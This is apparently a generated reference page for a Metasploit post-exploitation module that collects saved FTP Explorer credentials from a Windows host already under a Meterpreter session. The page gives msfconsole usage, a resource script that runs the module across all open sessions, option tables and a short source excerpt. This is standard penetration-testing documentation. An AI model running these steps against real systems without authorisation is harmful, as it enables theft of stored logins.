Windows Gather FTP Explorer (FTPX) Credential Extraction - Metasploit


This page contains detailed information about how to use the post/windows/gather/credentials/ftpx metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: Windows Gather FTP Explorer (FTPX) Credential Extraction
Module: post/windows/gather/credentials/ftpx
Source code: modules/post/windows/gather/credentials/ftpx.rb
Disclosure date: -
Last modification time: 2021-10-06 13:43:31 +0000
Supported architecture(s): -
Supported platform(s): Windows
Target service / protocol: -
Target network port(s): -
List of CVEs: -

This module finds saved login credentials for the FTP Explorer (FTPx) FTP client for Windows.

Module Ranking and Traits


Module Ranking:

  • normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.

Basic Usage


There are two ways to execute this post module.

From the Meterpreter prompt

The first is by using the "run" command at the Meterpreter prompt. It allows you to run the post module against that specific session:

meterpreter > run post/windows/gather/credentials/ftpx

From the msf prompt

The second is by using the "use" command at the msf prompt. You will have to figure out which session ID to set manually. To list all session IDs, you can use the "sessions" command.

msf > use post/windows/gather/credentials/ftpx
msf post(ftpx) > show options
    ... show and set options ...
msf post(ftpx) > set SESSION session-id
msf post(ftpx) > exploit

If you wish to run the post against all sessions from framework, here is how:

1 - Create the following resource script:


framework.sessions.each_pair do |sid, session|
  run_single("use post/windows/gather/credentials/ftpx")
  run_single("set SESSION #{sid}")
  run_single("run")
end

2 - At the msf prompt, execute the above resource script:

msf > resource path-to-resource-script

Required Options


  • SESSION: The session to run this module on.

Go back to menu.

Msfconsole Usage


Here is how the windows/gather/credentials/ftpx post exploitation module looks in the msfconsole:

msf6 > use post/windows/gather/credentials/ftpx

msf6 post(windows/gather/credentials/ftpx) > show info

       Name: Windows Gather FTP Explorer (FTPX) Credential Extraction
     Module: post/windows/gather/credentials/ftpx
   Platform: Windows
       Arch: 
       Rank: Normal

Provided by:
  bcoles <[email protected]>

Compatible session types:
  Meterpreter

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  SESSION                   yes       The session to run this module on.

Description:
  This module finds saved login credentials for the FTP Explorer 
  (FTPx) FTP client for Windows.

Module Options


This is a complete list of options available in the windows/gather/credentials/ftpx post exploitation module:

msf6 post(windows/gather/credentials/ftpx) > show options

Module options (post/windows/gather/credentials/ftpx):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on.

Advanced Options


Here is a complete list of advanced options supported by the windows/gather/credentials/ftpx post exploitation module:

msf6 post(windows/gather/credentials/ftpx) > show advanced

Module advanced options (post/windows/gather/credentials/ftpx):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   VERBOSE    false            no        Enable detailed status messages
   WORKSPACE                   no        Specify the workspace for this module

Post Actions


This is a list of all post exploitation actions which the windows/gather/credentials/ftpx module can do:

msf6 post(windows/gather/credentials/ftpx) > show actions

Post actions:

   Name  Description
   ----  -----------

Evasion Options


Here is the full list of possible evasion options supported by the windows/gather/credentials/ftpx post exploitation module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 post(windows/gather/credentials/ftpx) > show evasion

Module evasion options:

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Go back to menu.

Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

Error when reading <PATH> (<E.MESSAGE>)


Here is a relevant code snippet related to the "Error when reading <PATH> (<E.MESSAGE>)" error message:

44:	      until connections.eof
45:	        condata << connections.read
46:	      end
47:	      return condata
48:	    rescue Rex::Post::Meterpreter::RequestError => e
49:	      print_error "Error when reading #{path} (#{e.message})"
50:	      return nil
51:	    end
52:	  end
53:	
54:	  # Extracts the saved connection data from the XML.

Go back to menu.


Go back to menu.

See Also


Check also the following modules related to this module:

Authors


  • bcoles

Version


This page has been produced using Metasploit Framework version 6.2.29-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.